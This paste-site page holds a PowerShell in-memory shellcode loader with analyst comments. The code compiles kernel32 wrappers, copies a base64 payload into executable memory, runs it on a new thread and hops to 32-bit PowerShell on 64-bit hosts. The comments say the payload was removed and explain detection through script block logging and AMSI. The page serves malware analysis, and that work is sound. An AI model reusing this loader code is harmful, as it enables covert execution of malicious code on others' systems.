James_inthe_box

decoded

Feb 27th, 2019
# NOTE(review): this paste is a PowerShell in-memory shellcode loader. It is
# annotated here for analysts only; the code is left exactly as pasted and
# nothing has been "fixed". The base64 payload on the FromBase64String line was
# removed before this page was archived, so what the injected code does cannot
# be determined from this page.
Set-StrictMode -Version 2

# Assigned once and never referenced anywhere in the visible script.
$eicar = ''

# $DoIt is a single-quoted here-string: nothing inside it is expanded or
# executed at this point. It is only run by the IEX calls at the bottom of the
# script. What the string contains, as written:
#   - a C# class inject.func that P/Invokes kernel32!VirtualAlloc,
#     kernel32!CreateThread and kernel32!WaitForSingleObject, compiled in
#     memory with CSharpCodeProvider (GenerateInMemory = $True) and referencing
#     System.dll plus the assembly that hosts [PsObject];
#   - a base64-decoded byte array ($var_code) copied into a buffer allocated
#     with Reserve|Commit and ExecuteReadWrite (0x40), i.e. a region that is
#     writable and executable at the same time;
#   - CreateThread started at the buffer address, followed by
#     WaitForSingleObject with an infinite timeout, so the hosting PowerShell
#     process blocks for as long as the injected thread runs;
#   - $global:result set to 3 when VirtualAlloc returns NULL and to 7 when
#     CreateThread does; those are the only failure paths in the string.
$DoIt = @'
$assembly = @"
using System;
using System.Runtime.InteropServices;
namespace inject {
public class func {
[Flags] public enum AllocationType { Commit = 0x1000, Reserve = 0x2000 }
[Flags] public enum MemoryProtection { ExecuteReadWrite = 0x40 }
[Flags] public enum Time : uint { Infinite = 0xFFFFFFFF }
[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
[DllImport("kernel32.dll")] public static extern int WaitForSingleObject(IntPtr hHandle, Time dwMilliseconds);
}
}
"@

$compiler = New-Object Microsoft.CSharp.CSharpCodeProvider
$params = New-Object System.CodeDom.Compiler.CompilerParameters
$params.ReferencedAssemblies.AddRange(@("System.dll", [PsObject].Assembly.Location))
$params.GenerateInMemory = $True
$result = $compiler.CompileAssemblyFromSource($params, $assembly)

[Byte[]]$var_code = [System.Convert]::FromBase64String("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")

$buffer = [inject.func]::VirtualAlloc(0, $var_code.Length + 1, [inject.func+AllocationType]::Reserve -bOr [inject.func+AllocationType]::Commit, [inject.func+MemoryProtection]::ExecuteReadWrite)
if ([Bool]!$buffer) {
$global:result = 3;
return
}
[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $buffer, $var_code.Length)
[IntPtr] $thread = [inject.func]::CreateThread(0, 0, $buffer, 0, 0, 0)
if ([Bool]!$thread) {
$global:result = 7;
return
}
$result2 = [inject.func]::WaitForSingleObject($thread, [inject.func+Time]::Infinite)
'@

# A pointer size of 8 means a 64-bit PowerShell host: the string is then
# evaluated inside a -RunAs32 background job (a 32-bit PowerShell process) and
# the job is waited on; a 32-bit host evaluates it directly in-process. The
# bitness hop presumably exists because the removed payload is 32-bit code,
# but that cannot be confirmed from this page.
# NOTE(review): the $DoIt / inject.func / -RunAs32 layout matches a widely
# published shellcode-loader template; treat this paste as a malware sample
# and base any family attribution on the decoded payload, not on this wrapper.
# Detection angle: because the loader reaches execution through IEX, PowerShell
# script block logging (event 4104) and AMSI would be expected to see the
# decoded content, including the DllImport("kernel32.dll") declarations, at
# run time even though the outer file holds it only as a string.
If ([IntPtr]::size -eq 8) {
start-job { param($a) IEX $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job
}
else {
IEX $DoIt
}